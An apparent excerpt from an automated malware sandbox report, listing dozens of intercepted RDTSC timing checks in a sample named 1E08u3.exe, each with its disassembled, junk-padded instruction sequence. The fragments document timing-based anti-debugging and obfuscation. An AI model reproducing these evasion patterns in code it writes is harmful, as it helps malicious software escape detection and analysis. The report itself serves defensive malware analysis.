                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E64 second address: 4D70EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD3A47FEE8Eh 0x0000000a add si, 9828h 0x0000000f jmp 00007FD3A47FEE8Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD3A47FEE96h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD3A47FEE8Dh 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70EB4 second address: 4D70EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70CC8 second address: 4D70CD4 instructions: 0x00000000 rdtsc 0x00000002 mov di, D64Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a mov eax, ebx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70CD4 second address: 4D70D03 instructions: 0x00000000 rdtsc 0x00000002 mov al, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FD3A4D6CB9Fh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD3A4D6CBA5h 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70D03 second address: 4D70D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 push edx 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70D23 second address: 4D70D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70D29 second address: 4D70D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D10 second address: 4D30D2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D2D second address: 4D30D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D33 second address: 4D30D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D37 second address: 4D30D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D3B second address: 4D30D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD3A4D6CBA2h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80301 second address: 4D80305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80305 second address: 4D8030B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D8030B second address: 4D80332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A47FEE90h 0x00000009 xor cx, 8F68h 0x0000000e jmp 00007FD3A47FEE8Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D706CB second address: 4D706CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D706CF second address: 4D706F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d call 00007FD3A47FEE93h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40A83 second address: 4D40AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD3A4D6CBA1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD3A4D6CBA7h 0x00000015 sbb esi, 0ABAAA0Eh 0x0000001b jmp 00007FD3A4D6CBA9h 0x00000020 popfd 0x00000021 mov ax, E317h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov di, 6C7Ah 0x0000002e call 00007FD3A4D6CB9Bh 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40AF0 second address: 4D40B36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007FD3A47FEE8Dh 0x00000013 jmp 00007FD3A47FEE8Bh 0x00000018 popfd 0x00000019 pop esi 0x0000001a mov si, bx 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40B36 second address: 4D40B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40B52 second address: 4D40B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40B58 second address: 4D40B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D000F8 second address: 4D00126 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A47FEE92h 0x00000008 or cl, FFFFFFD8h 0x0000000b jmp 00007FD3A47FEE8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00126 second address: 4D0012A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0012A second address: 4D00130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00130 second address: 4D00136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00136 second address: 4D00161 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD3A47FEE8Eh 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00161 second address: 4D00167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00167 second address: 4D0016B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0016B second address: 4D0016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0016F second address: 4D00247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FD3A47FEE99h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FD3A47FEE8Eh 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007FD3A47FEE90h 0x0000001d xchg eax, ecx 0x0000001e pushad 0x0000001f mov cx, 9DEDh 0x00000023 pushfd 0x00000024 jmp 00007FD3A47FEE8Ah 0x00000029 xor esi, 713FC988h 0x0000002f jmp 00007FD3A47FEE8Bh 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 jmp 00007FD3A47FEE92h 0x0000003d popad 0x0000003e xchg eax, ecx 0x0000003f jmp 00007FD3A47FEE90h 0x00000044 xchg eax, ebx 0x00000045 jmp 00007FD3A47FEE90h 0x0000004a push eax 0x0000004b jmp 00007FD3A47FEE8Bh 0x00000050 xchg eax, ebx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FD3A47FEE90h 0x00000058 add al, FFFFFFA8h 0x0000005b jmp 00007FD3A47FEE8Bh 0x00000060 popfd 0x00000061 popad 0x00000062 mov ebx, dword ptr [ebp+10h] 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00247 second address: 4D0024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0024B second address: 4D00266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00266 second address: 4D0026C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0026C second address: 4D00270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00270 second address: 4D002AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f pushfd 0x00000010 jmp 00007FD3A4D6CBA5h 0x00000015 or cx, ACD6h 0x0000001a jmp 00007FD3A4D6CBA1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D002AD second address: 4D00330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 jmp 00007FD3A47FEE98h 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FD3A47FEE8Eh 0x00000020 add si, 1C88h 0x00000025 jmp 00007FD3A47FEE8Bh 0x0000002a popfd 0x0000002b mov ecx, 30C79CFFh 0x00000030 popad 0x00000031 xchg eax, edi 0x00000032 jmp 00007FD3A47FEE92h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FD3A47FEE8Eh 0x0000003f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00330 second address: 4D00387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD3A4D6CBA6h 0x0000000f test esi, esi 0x00000011 jmp 00007FD3A4D6CBA0h 0x00000016 je 00007FD41776AE43h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD3A4D6CBA7h 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00387 second address: 4D003B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1DFAh 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD3A47FEE98h 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D003B4 second address: 4D003BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D003BC second address: 4D0048B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FD4171FD0EEh 0x0000000d jmp 00007FD3A47FEE99h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 jmp 00007FD3A47FEE8Eh 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, eax 0x00000021 mov eax, 74AD1F2Fh 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007FD3A47FEE94h 0x0000002d jmp 00007FD3A47FEE95h 0x00000032 popfd 0x00000033 popad 0x00000034 test edx, 61000000h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FD3A47FEE93h 0x00000043 adc si, 83CEh 0x00000048 jmp 00007FD3A47FEE99h 0x0000004d popfd 0x0000004e pushfd 0x0000004f jmp 00007FD3A47FEE90h 0x00000054 sbb cx, E448h 0x00000059 jmp 00007FD3A47FEE8Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0048B second address: 4D004BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD41776AD76h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD3A4D6CB9Dh 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D004BD second address: 4D004F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD3A47FEE8Ah 0x00000016 sub esi, 353BD438h 0x0000001c jmp 00007FD3A47FEE8Bh 0x00000021 popfd 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D004F6 second address: 4D00514 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 3A6Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c jne 00007FD41776AD35h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD3A4D6CB9Ah 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30019 second address: 4D30029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30029 second address: 4D3006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FD3A4D6CB9Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FD3A4D6CBA0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3A4D6CBA7h 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3006C second address: 4D3010E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007FD3A47FEE8Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov esi, 18A2334Dh 0x00000018 pushfd 0x00000019 jmp 00007FD3A47FEE8Ah 0x0000001e sub al, 00000068h 0x00000021 jmp 00007FD3A47FEE8Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FD3A47FEE99h 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 mov cx, 82E3h 0x00000034 pushfd 0x00000035 jmp 00007FD3A47FEE98h 0x0000003a sbb si, F728h 0x0000003f jmp 00007FD3A47FEE8Bh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3010E second address: 4D30112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30112 second address: 4D3012D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3012D second address: 4D3018B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD3A4D6CBA7h 0x00000011 xor eax, 735A0B2Eh 0x00000017 jmp 00007FD3A4D6CBA9h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f mov eax, 220A388Dh 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3018B second address: 4D3021F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007FD3A47FEE94h 0x0000000d mov esi, dword ptr [ebp+08h] 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 pushfd 0x00000014 jmp 00007FD3A47FEE8Ah 0x00000019 jmp 00007FD3A47FEE95h 0x0000001e popfd 0x0000001f popad 0x00000020 sub ebx, ebx 0x00000022 jmp 00007FD3A47FEE97h 0x00000027 test esi, esi 0x00000029 jmp 00007FD3A47FEE96h 0x0000002e je 00007FD4171C5014h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD3A47FEE97h 0x0000003b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3021F second address: 4D3027D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 11AE3D1Ah 0x00000008 call 00007FD3A4D6CB9Bh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD3A4D6CBA0h 0x00000021 xor esi, 27147C88h 0x00000027 jmp 00007FD3A4D6CB9Bh 0x0000002c popfd 0x0000002d call 00007FD3A4D6CBA8h 0x00000032 pop esi 0x00000033 popad 0x00000034 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D3027D second address: 4D302AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FD3A47FEE90h 0x00000010 je 00007FD4171C4F86h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302AF second address: 4D302B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302B5 second address: 4D302C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Bh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302C4 second address: 4D302C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302C8 second address: 4D302FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [77786968h], 00000002h 0x0000000f jmp 00007FD3A47FEE95h 0x00000014 jne 00007FD4171C4F50h 0x0000001a pushad 0x0000001b mov esi, 16D21D33h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D302FC second address: 4D30300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30300 second address: 4D30345 instructions: 0x00000000 rdtsc 0x00000002 mov cx, FFABh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD3A47FEE93h 0x00000015 xor cx, CE4Eh 0x0000001a jmp 00007FD3A47FEE99h 0x0000001f popfd 0x00000020 mov edi, esi 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30345 second address: 4D303EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A4D6CBA3h 0x00000009 and si, 3C5Eh 0x0000000e jmp 00007FD3A4D6CBA9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD3A4D6CBA0h 0x0000001a jmp 00007FD3A4D6CBA5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebx 0x00000024 jmp 00007FD3A4D6CB9Eh 0x00000029 push eax 0x0000002a pushad 0x0000002b mov di, 3A64h 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FD3A4D6CBA5h 0x00000038 and eax, 16E1FD56h 0x0000003e jmp 00007FD3A4D6CBA1h 0x00000043 popfd 0x00000044 push eax 0x00000045 push edx 0x00000046 mov ebx, esi 0x00000048 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D303EF second address: 4D30429 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A47FEE8Ah 0x00000008 sub esi, 4F104F78h 0x0000000e jmp 00007FD3A47FEE8Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3A47FEE95h 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30429 second address: 4D3042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
